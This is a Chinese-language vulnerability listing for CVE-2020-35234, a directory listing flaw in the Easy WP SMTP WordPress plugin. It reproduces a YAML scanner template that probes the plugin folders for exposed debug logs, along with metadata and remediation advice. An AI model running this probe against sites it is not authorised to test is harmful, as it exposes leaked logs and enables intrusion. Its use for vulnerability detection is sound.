CVE-2020-35234: SMTP WP Plugin Directory Listing

日期: 2025-08-01 | 影响软件: SMTP WP Plugin | POC: 已公开

漏洞描述

The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.

PoC代码[已公开]

id: CVE-2020-35234

info:
  name: SMTP WP Plugin Directory Listing
  author: PR3R00T
  severity: high
  description: The WordPress Easy WP SMTP Plugin has its log folder remotely accessible and its content available for access.
  impact: |
    Low: Information disclosure
  remediation: Upgrade to version 1.4.3 or newer and consider disabling debug logs.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35234
    - https://blog.nintechnet.com/wordpress-easy-wp-smtp-plugin-fixed-zero-day-vulnerability/
    - https://wordpress.org/plugins/easy-wp-smtp/#developers
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2020-35234
    cwe-id: CWE-532
    epss-score: 0.72502
    epss-percentile: 0.98723
    cpe: cpe:2.3:a:wp-ecommerce:easy_wp_smtp:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wp-ecommerce
    product: easy_wp_smtp
    framework: wordpress
  tags: cve2020,cve,wordpress,wp-plugin,smtp,wp-ecommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/easy-wp-smtp/"
      - "{{BaseURL}}/wp-content/plugins/wp-mail-smtp-pro/"

    matchers:
      - type: word
        words:
          - "debug"
          - "log"
          - "Index of"
        condition: and
# digest: 4b0a0048304602210094a52cfff1c301923865a4c63c48c4ecd64f357f7d47850989fe1da18a01fa320221008b79f6688b19203150b449b2c3d1177e096ae49ab3f9012e07780786e41161fe:922c64590222798bb761d5b6d8e72950

相关漏洞推荐